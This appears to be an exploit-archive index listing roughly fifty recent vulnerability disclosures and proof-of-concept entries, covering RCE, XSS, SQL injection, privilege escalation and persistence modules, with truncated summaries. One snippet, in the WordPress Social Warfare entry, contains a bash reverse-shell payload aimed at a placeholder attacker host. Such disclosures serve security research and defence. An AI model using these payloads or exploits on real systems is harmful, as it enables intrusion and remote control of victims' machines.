TightVNC 2.8.83 Control Pipe Manipulation
TightVNC version 2.8.83 suffers from a control pipe manipulation vulnerability. Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation Date: 06/09/2025 Exploit Author: Ionut Zevedei [email protected] Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC Vendor Homepage:...
Remote for Mac 2025.7 Unauthenticated Remote Code Execution
This Metasploit module exploits an unauthenticated remote code execution vulnerability in Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint. When authentication is disabled on the target system, it allows attackers to execute arbitrary AppleScript commands,...
RAD FT Dell Firmware A00-00 Privilege Escalation
RAD FT Firmware versions A00-00 Build WP0000051154 and prior are susceptible to a privilege escalation vulnerability due to a failure to properly filter the user-supplied input through the .NET Profiler. Exploit name: RAD FT Dell Firmware Download link:...
FUDForum 3.2.0 Command Injection
FUDForum version 3.2.0 suffers from a code injection vulnerability. Exploit Title: FUDForum 3.2.0 Command Injection Authenticated Exploit Author: tmrswrr Vendor Homepage: http://fudforum.org/ Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum3.2.0.zip/download Version : 3.2.0...
vBulletin 4.x movepm PHP Object Injection
In vBulletin 4.x, a flawed security patch from 2014 has introduced a new post-auth PHP object injection vector by replacing serialize with jsonencode, ironically making it possible to get vBulletin to sign attacker-controlled base64-encoded payloads, potentially allowing users to perform remote...
Microsoft Windows Server 2025 JScript Engine Remote Code Execution
This proof of concept exploits a use-after-free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution. !/usr/bin/env python3 Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution...
macOS / iOS Local Privilege Escalation
This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary, creates an admin user, and installs a persistent LaunchDaemon backdoor...
HRM 1.0 2025 Cross Site Scripting
HRM version 1.0 2025 suffers from a cross site scripting vulnerability. Titles: HRM-1.0 2025 Cross-site scripting reflected Author: nu11secur1ty Date: 06/06/2025 Vendor: https://github.com/oretnom23 Software:...
Apache Tomcat 10.1.39 Denial of Service
Apache Tomcat version 10.1.39 suffers from a denial of service vulnerability. Exploit Title: Apache Tomcat 10.1.39 - Denial of Service DOS Author: Abdualhadi khalifa CVE: CVE-2025-31650 import httpx import asyncio import random import urllib.parse import sys import socket from colorama import ini...
ABB Cylon Aspect 3.08.04 DeploySource Unauthenticated Remote Code Execution
ABB Cylon Aspect BMS/BAS version 3.08.04 is vulnerable to a critical flaw in the AuthenticatedHttpServlet within its application server, enabling remote attackers to bypass authentication by setting the Host: 127.0.0.1 header. This deceives the server into processing requests as if they originate...
Udev Persistence
This Metasploit module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk. It will be executed with root privileges every time a network interface other than l0 comes up. This module requires Metasploit: https://metasploit.com/download Current source:...
Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution
This Metasploit module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM, tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated access to an administrator web API endpoint, which allows for code execution via expression language...
Adapt CMS 3.0.3 Cross Site Scripting
Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability in the Send Message functionality. Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...
Adapt CMS 3.0.3 Remote Shell Upload
Adapt CMS version 3.0.3 suffers from a remote shell upload vulnerability. Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE 1:...
ERPNext 15.53.1 Cross Site Scripting
ERPNext version 15.53.1 suffers from multiple persistent cross site scripting vulnerabilities. An authenticated user can inject malicious JavaScript into the userimage field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient...
Adapt CMS 3.0.3 Cross Site Scripting
Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability via file upload. Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Stored XSS via...
PSF Request Library Credential Leak
The PSF requests library leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. The PSF requests library https://github.com/psf/requests & https://pypi.org/project/requests/ leaks .netrc credentials to third parties due to incorrect URL processing und...
Adapt CMS 3.0.3 Insecure Direct Object Reference / Incorrect Authorization
Adapt CMS version 3.0.3 suffers from an insecure direct object reference vulnerability that allows for privilege escalation. Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...
WordPress Social Warfare 3.5.2 Remote Code Execution
Proof of concept remote code execution exploit for WordPress Social Warfare plugin versions 3.5.2 and below. !/usr/bin/env python3 Exploit Title: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin system"bash -c \"bash -i & /dev/tcp/ATTACKERIP/LISTENPORT 0&1\""' with...
Microsoft Windows Registry Protection Removal
Thanks to OFFREG.dll, every unprivileged user can copy the registry tree HKEY_CURRENT_USER except of course the registry keys where the policies are stored to an offline registry hive ntuser.man and thus get rid of any restrictions previously imposed via user group policies after logging off and on...
CloudClassroom PHP Project 1.0 SQL Injection
CloudClassroom PHP Project version 1.0 suffers from a time-based blind remote SQL Injection vulnerability. Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project:...
Motivian Content Management System 41.0.0 Arbitrary File Upload
Motivian Content Management System version 41.0.0 suffers from an arbitrary file upload vulnerability. CVE-2025-29093-Arbitrary-File-Upload This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29093: Arbitrary File Upload This...
WatchGuard 12.11 Memory Corruption
WatchGuard version 12.11 memory corruption proof of concept exploit. $ cat watchguard12.11postauthclibof.py !/usr/bin/env python3 watchguard12.11postauthclibof.py this is a poc for post authorized stack overflow found in 'cli' binary. Tue Feb 4 06:12:20 EST 2025 by code610 More: networkdevice=...
Motivian Content Management System 41.0.0 Cross Site Scripting
Motivian Content Management System version 41.0.0 suffers from multiple cross site scripting vulnerabilities. CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29094:...
Unifiedtransform 2.x Student Editor Missing Authorization
Unifiedtransform version 2.x allows any user to access and modify student records via the /students/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify student records via the /students/edit/id...
Unifiedtransform 2.x Course Editor Missing Authorization
Unifiedtransform version 2.x allows any user to access and modify course records via the /course/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify course details via the /course/edit/id endpoints...
RustFly 2.0.0 Remote Code Execution
RustFly version 2.0.0 contains a critical vulnerability in its remote input processing layer that allows unauthenticated attackers to achieve remote code execution. RustFly v2.0.0- Remote Code Execution RCE Exploit Title: RustFly v2.0.0- Remote Code Execution RCE Date: 2025-05-29 Exploit Author:...
Campcodes Online Hospital Management System 1.0 SQL Injection
Campcodes Online Hospital Management System version 1.0 suffers from a remote SQL injection vulnerability. Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection Google Dork: N/A Exploit Author: Carine Constantino Vendor Homepage: https://www.campcodes.com Software Link:...
Kion Exchange Programs Software 1.21.9092.29966 Cross Site Scripting
Kion Exchange Programs Software versions 1.21.9092.29966 and below suffer from a cross site scripting vulnerability. Exploit Title: Kion Exchange Programs Software Reflected XSS CVE: CVE-2024-7130 PoC-Date: 2025-05-28 Exploit Author: Kutay ERGEN Vendor Homepage: https://www.kionexchangeprograms.c...
Fortra GoAnywhere MFT 7.4.1 Authentication Bypass
Fortra GoAnywhere MFT version 7.4.1 proof of concept authentication bypass exploit. !/usr/bin/env python3 -- coding: utf-8 -- Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass Date: 2025-05-25 Exploit Author: @ibrahimsql Exploit Author's github: https://github.com/ibrahimsql Vend...
Automic Agent 24.3.0 HF4 Privilege Escalation
Automic Agent version 24.3.0 HF4 suffers from a privilege escalation vulnerability. Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation Date: 26.05.2025 Exploit Author: Flora Schäfer Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation Version:...
Windows File Explorer NTLM Hash Disclosure
Windows File Explorer on Microsoft Windows 11 23H2 proof of concept NTLM hash disclosure exploit. !/usr/bin/env python3 Exploit Title: Windows File Explorer Windows 11 23H2 - NTLM Hash Disclosure Exploit Author: Mohammed Idrees Banyamer Twitter/GitHub:https://github.com/mbanyamer Date: 2025-05-27...
Remote for Mac 2025.6 Unauthenticated Arbitrary Input
Remote for Mac version 2025.6 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-28 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...
eCharge Hardy Barth cPH2 / cPP2 Charging Stations 2.2.0 Command Injection / Backdoor
eCharge Hardy Barth cPH2 and cPP2 Charging Stations version 2.2.0 suffer from missing authentication, OS command injection, backdoor user accounts, backdoor functionality, and hardcoded key vulnerabilities. SEC Consult Vulnerability Lab Security Advisory...
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker to forge ViewState data. This can lead to unauthorized actions such as remote code execution. Both applications make use of a hardcoded machineKey in the IIS...
Frappe Framework 15.56.1 SQL Injection
Frappe Framework version 15.56.1 suffers from a remote SQL injection vulnerability. An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.getlist API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields...
Remote for Mac 2025.6 Desktop Stream Disclosure
Remote for Mac version 2025.6 suffers from an unauthenticated desktop stream disclosure vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit Date: 2025-05-27 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...
KRUKSTON BISTRO 1.0 SQL Injection
KRUKSTON BISTRO version 1.0 suffers from a remote SQL injection vulnerability. Titles: KRUKSTON-BISTRO-1.0 Multiple-SQLi Author: nu11secur1ty Date: 05/27/2025 Vendor: https://www.mayurik.com/ Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html Reference:...
Remote for Mac 2025.6 Remote Code Execution
Remote for Mac version 2025.6 allows an unauthenticated remote attacker to achieve remote code execution by sending a crafted sequence of UDP packets that simulate keyboard input. Exploit Title: Remote for Mac 2025.6 - Remote Code Execution RCE Date: 2025-05-27 Exploit Author: Chokri Hammedi Vend...
Remote for Windows 2024.15 Unauthenticated Arbitrary Input
Remote for Windows version 2024.15 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...
Remote for Mac 2025.6 Remote Code Execution
Remote for Mac version 2025.6 suffers from an unauthenticated remote code execution vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link: https://cherpake.com/latest.php?os=ma...
Java-springboot-codebase 1.1 Arbitrary File Read
Java-springboot-codebase version 1.1 suffers from an arbitrary file read vulnerability. Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read Google Dork: Date: 23/May/2025 Exploit Author: d3sca Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase Software Link:...
Remote for Windows 2024.15 Unquoted Service Path
Remote for Windows version 2024.15 suffers from an unquoted service path vulnerability. Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link: https://rs.ltd/latest.php?os=win Version: 2024.1...
Remote for Mac 2025.6 Desktop Screenshot Capture
Remote for Mac version 2025.6 suffers from an unauthenticated desktop screenshot capture vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Screenshot Capture Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...
WordPress User Registration and Membership 4.1.2 Authentication Bypass
WordPress User Registration and Membership plugin versions 4.1.2 and below suffer from an authentication bypass vulnerability. !/usr/bin/env python3 Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Date: 2025-05-22 Exploit Author: Mohammed Idrees Banyam...
vBulletin replaceAdTemplate Remote Code Execution
vBulletin replaceAdTemplate remote code execution proof of concept exploit. Versions 5.0.0 through 6.0.3 are affected. ?php / ----------------------------------------------------------------- vBulletin replaceAdTemplate Remote Code Execution Vulnerability...
Palo Alto 11.1.4-h7 Memory Corruption
Palo Alto version 11.1.4-h7 post authentication memory corruption proof of concept exploit. !/usr/bin/env python3 post auth cli memory corruption poc for paloalto 11.1.4-h7 19.01.2025 @ 00:23 postauth user in general 'admin' but we'll get back to that later ; can use cli to provide one of the...
Grandstream GSD3710 1.0.11.13 Stack Buffer Overflow
Grandstream GSD3710 version 1.0.11.13 suffers from a stack buffer overflow vulnerability. !/usr/bin/env python3 Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow Google Dork: if applicable Date: 2025-05-23 Exploit Author: Pepelux user in ExploitDB Vendor Homepage:...
ABB Cylon Aspect 3.08.03 projectUpdateBSXFileProcess.php Remote Guest2Root
The ABB BMS/BAS controller is vulnerable to code execution and sudo misconfiguration flaws. An authenticated remote code execution vulnerability in the firmware update mechanism allows an attacker with valid credentials to escalate privileges and execute commands as root. The process involves...
ABB Cylon Aspect 3.08.03 productRemovalUpdate.php Remote Code Execution
The ABB BMS/BAS controller suffers from an authenticated blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'instance' HTTP POST parameter called by the productRemovalUpdate.php script. The token key POST param needs to be se...